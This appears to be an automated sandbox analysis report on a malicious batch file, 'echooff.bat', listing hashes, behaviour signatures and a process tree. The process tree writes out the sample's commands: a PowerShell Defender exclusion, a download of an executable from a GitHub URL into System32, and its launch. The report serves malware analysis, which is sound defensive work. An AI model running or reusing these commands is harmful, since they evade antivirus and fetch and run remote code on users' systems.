Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/03/2025, 20:49
Static task
static1
Behavioral task
behavioral1
Sample
echooff.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
echooff.bat
Resource
win10v2004-20250217-en
General
-
Target
echooff.bat
-
Size
2KB
-
MD5
1454db52a096ed81ab7ca936367ceabd
-
SHA1
25c32881677a892e4b9bc7d45d387bec22847685
-
SHA256
bf2edb2090118c826cb7fb3d3c7cbda1066bceaeaff02874d94f9ae940f2f09c
-
SHA512
a895401536357a07d9bd9167f5c36152a8e06c68bf6967b8540493c51fc1f8cfd4bd60cf68a094ebddf33e272c3c39fa753952bba3c0ca0cc39bfc1e939792c7
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1936 powershell.exe 2964 powershell.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2676 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1936 powershell.exe 2964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1632 wrote to memory of 536 1632 cmd.exe 32 PID 1632 wrote to memory of 536 1632 cmd.exe 32 PID 1632 wrote to memory of 536 1632 cmd.exe 32 PID 1632 wrote to memory of 2016 1632 cmd.exe 33 PID 1632 wrote to memory of 2016 1632 cmd.exe 33 PID 1632 wrote to memory of 2016 1632 cmd.exe 33 PID 2016 wrote to memory of 2012 2016 cmd.exe 34 PID 2016 wrote to memory of 2012 2016 cmd.exe 34 PID 2016 wrote to memory of 2012 2016 cmd.exe 34 PID 2016 wrote to memory of 560 2016 cmd.exe 35 PID 2016 wrote to memory of 560 2016 cmd.exe 35 PID 2016 wrote to memory of 560 2016 cmd.exe 35 PID 1632 wrote to memory of 1936 1632 cmd.exe 36 PID 1632 wrote to memory of 1936 1632 cmd.exe 36 PID 1632 wrote to memory of 1936 1632 cmd.exe 36 PID 1632 wrote to memory of 2964 1632 cmd.exe 37 PID 1632 wrote to memory of 2964 1632 cmd.exe 37 PID 1632 wrote to memory of 2964 1632 cmd.exe 37 PID 1632 wrote to memory of 2676 1632 cmd.exe 38 PID 1632 wrote to memory of 2676 1632 cmd.exe 38 PID 1632 wrote to memory of 2676 1632 cmd.exe 38
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\echooff.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD53⤵PID:2012
-
-
C:\Windows\system32\find.exefind /i "MD5 hash"3⤵PID:560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\tes.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\system32\cmd.execmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe""2⤵
- Access Token Manipulation: Create Process with Token
PID:2676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD528c1003b3d384848414b5d175ec09903
SHA1c4d02c0b1b00d4a9f82eaedda078fea1f54779e4
SHA25640b032575bfdbf5ce6cadf91ffdb8597b3427212821e07fa5c09cc1b35be1864
SHA512fd4db0ba34089e110bf50c561c8d43524dcb91f348d1c0a167c2d2385b142d0b88b08ec5da2b375b2af0530dde452d4264dcfa4889a7f27a418de6322b0e6581